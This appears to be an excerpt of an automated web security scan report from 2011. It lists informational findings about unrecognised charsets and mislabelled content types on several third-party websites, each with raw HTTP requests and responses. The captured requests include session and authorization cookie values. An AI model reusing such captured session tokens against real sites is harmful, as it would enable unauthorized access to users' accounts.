Referer: http://www.pandasecurity.com/virus_info/flash/pandaThreatWatch_migracion.swf?idiom=2&dir=http://www.pandasecurity.com/virus_info/exports/&dirMapa=http://www.pandasecurity.com/virus_info/flash/&dircfg=http://www.pandasecurity.com/virus_info/exports/alert/&dirPaises=http://www.pandasecurity.com/virus_info/exports/&dirTitulos=http://www.pandasecurity.com/virus_info/flash/&dirTicker=http://www.pandasecurity.com/virus_info/exports/&dirlst1=http://www.pandasecurity.com/virus_info/exports/encyclopedia/&dirlst2=http://www.pandasecurity.com/virus_info/exports/encyclopedia/virus/&acercade=http://www.pandasecurity.com/homeusers/security-info/gtw/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Content-Length: 35
Cache-Control: no-cache
Date: Sat, 26 Mar 2011 17:03:28 GMT
Connection: close
Vary: Accept-Encoding

fechaHoraActual=26/03/2011 17:03:00
29.41. http://www.paperg.com/jsfb/embed.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Request

GET /jsfb/embed.php?pid=3922&bid=2123 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/archives/'+NSFTW+'?ordering=&searchphrase=all
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:13:22 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 45225
Connection: Keep-alive
Via: 1.1 AN-0016020122637050


var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123 = 'http://www.
...[SNIP]...
30. HTML uses unrecognised charset  previous  next
There are 7 instances of this issue:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

30.1. http://www.fast-report.com/bitrix/redirect2.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fast-report.com
Path:   /bitrix/redirect2.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /bitrix/redirect2.php?event1=avangate_out&event2=FastReport.Net%20Basic%20Edition%20Single&goto=https%3A%2F%2Fsecure.avangate.com%2Forder%2Fcart.php%3FPRODS%3D1523013%26QTY%3D1%26GID%3D%23EVENT_GID%23 HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A38

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:30:45 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:30:48 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A48; expires=Tue, 20-Mar-2012 16:30:48 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 363

<html><head><script language="JavaScript1.1" type="text/javascript">function rd(){b_form.submit();}</script></head><body onload="rd();"><form name="b_form" action="redirect3.php" method=get><input typ
...[SNIP]...
30.2. http://www.fast-report.com/en/buy/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fast-report.com
Path:   /en/buy/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/buy/ HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=76cc7f5b0df4ee756aa4259ff29089dc; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A18

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 11:41:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2F; expires=Tue, 05-Apr-2011 11:41:20 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 11:41:21 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A21; expires=Tue, 20-Mar-2012 11:41:21 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 18472

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&LANG=en&TYPE=news&LIMIT=5" />
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<META NAME="ROBOTS" content="ALL">
...[SNIP]...
30.3. http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fast-report.com
Path:   /en/buy/order-FASTREPORT.NET.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/buy/order-FASTREPORT.NET.html HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2F; PHPSESSID=76cc7f5b0df4ee756aa4259ff29089dc; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A19

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 11:41:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fbuy%2F; expires=Tue, 05-Apr-2011 11:41:29 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 11:41:31 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A31; expires=Tue, 20-Mar-2012 11:41:31 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 29289

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&LANG=en&TYPE=news&LIMIT=5" />
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<META NAME="ROBOTS" content="ALL">
...[SNIP]...
30.4. http://www.fast-report.com/en/download/fastreport.net-download.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fast-report.com
Path:   /en/download/fastreport.net-download.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/download/fastreport.net-download.html HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A20

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:30:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:30:30 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A30; expires=Tue, 20-Mar-2012 16:30:30 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 20098

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&LANG=en&TYPE=news&LIMIT=5" />
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<META NAME="ROBOTS" content="ALL">
...[SNIP]...
30.5. http://www.fast-report.com/en/download/fastreport.net-download.html/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fast-report.com
Path:   /en/download/fastreport.net-download.html/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/download/fastreport.net-download.html/? HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/products/FastReport.Net.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A31

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:30:40 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fproducts%2FFastReport.Net.html; expires=Tue, 05-Apr-2011 16:30:40 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:30:42 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A42; expires=Tue, 20-Mar-2012 16:30:42 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 20062

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&LANG=en&TYPE=news&LIMIT=5" />
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<META NAME="ROBOTS" content="ALL">
...[SNIP]...
30.6. http://www.fast-report.com/en/products/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fast-report.com
Path:   /en/products/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/products/ HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=76cc7f5b0df4ee756aa4259ff29089dc; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A28

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 11:41:31 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fbuy%2Forder-FASTREPORT.NET.html; expires=Tue, 05-Apr-2011 11:41:31 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 11:41:34 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A34; expires=Tue, 20-Mar-2012 11:41:34 GMT; path=/
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fbuy%2Forder-FASTREPORT.NET.html; expires=Tue, 05-Apr-2011 11:41:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 26652

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&LANG=en&TYPE=news&LIMIT=5" />
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<META NAME="ROBOTS" content="ALL">
...[SNIP]...
30.7. http://www.fast-report.com/en/products/FastReport.Net.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fast-report.com
Path:   /en/products/FastReport.Net.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/products/FastReport.Net.html HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2F; PHPSESSID=9371061dd45cfcf52f2cdac620e620ab; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A20

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 16:30:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 16:30:29 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+11%3A30%3A29; expires=Tue, 20-Mar-2012 16:30:29 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 19540

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&LANG=en&TYPE=news&LIMIT=5" />
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<META NAME="ROBOTS" content="ALL">
...[SNIP]...
31. Content type incorrectly stated  previous  next
There are 32 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

31.1. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=FA3AE6176FAC4414AD6FC26C726B4B15&MUID=FA3AE6176FAC4414AD6FC26C726B4B15&PG=CMS3TK&AP=1390 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=1593e55bc6bd4a6fa24e1aa0798f062a; mh=MSFT; CC=US; CULTURE=EN-US; FC06=FB=AgEAkg7i5pAB; expid=id=6b1cac6514464382aeb0ec1c3a7c9515&bd=2011-03-22T21:01:56.366&v=2; Sample=86; SRCHHPGUSR=AS=1; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2434
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8443954-T34931985-C42000000000035378
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 26 Mar 2011 01:40:01 GMT
Content-Length: 2434


//<![CDATA[
function getRADIds() { return{"adid":"42000000000035378","pid":"8443954","targetid":"34931985"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);if(paren
...[SNIP]...
31.2. http://a12.alphagodaddy.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a12.alphagodaddy.com
Path:   /

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET / HTTP/1.1
Host: a12.alphagodaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 14:32:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Content-Length: 10
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- 1 -->
31.3. https://a12.alphagodaddy.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://a12.alphagodaddy.com
Path:   /

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET / HTTP/1.1
Host: a12.alphagodaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 14:32:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Content-Length: 10
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- 1 -->
31.4. http://blogs.technet.com/analyticsid.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blogs.technet.com
Path:   /analyticsid.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /analyticsid.aspx HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a31+GMT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a45%3a52+GMT; expires=Sun, 25-Mar-2012 01:45:52 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:51 GMT
Content-Length: 67

<!--
gAnalyticsId="e14f9228-b1a1-4555-b530-1be10b6d7116";
// -->
31.5. http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blogs.technet.com
Path:   /b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

POST /b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
Content-Length: 496
Origin: http://blogs.technet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a31+GMT; omniID=1301103997741_d54d_515d_2778_de1e1091d8c5; s_cc=true; s_sq=%5B%5BB%5D%5D

ctl00$content$ctl00$ctl00=custom%3Aid%3Dfragment-6108%26renderFromCurrent%3DTrue%26callback_control_id%3Dctl00%2524content%2524ctl00%2524fragment_6108%2524ctl01%2524ctl00%2524ctl02%2524ctl05%2524Delay
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a46%3a31+GMT; expires=Sun, 25-Mar-2012 01:46:31 GMT; path=/
X-Pingback: http://blogs.technet.com/b/mmpc/pingback.aspx
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:46:30 GMT
Content-Length: 1442

s{'response':'<input type="hidden" name="ctl00$content$ctl00$fragment_6108$ctl01$ctl00$ctl02$ctl05$DelayedFeedbackList" value="true:undefined" />\r\n         \r\n         \r\n        ','includeScriptUrls':new Arr
...[SNIP]...
31.6. https://feedback.discoverbing.com/jsinterface.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://feedback.discoverbing.com
Path:   /jsinterface.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /jsinterface.aspx?op=1&q=dd29 HTTP/1.1
Host: feedback.discoverbing.com
Connection: keep-alive
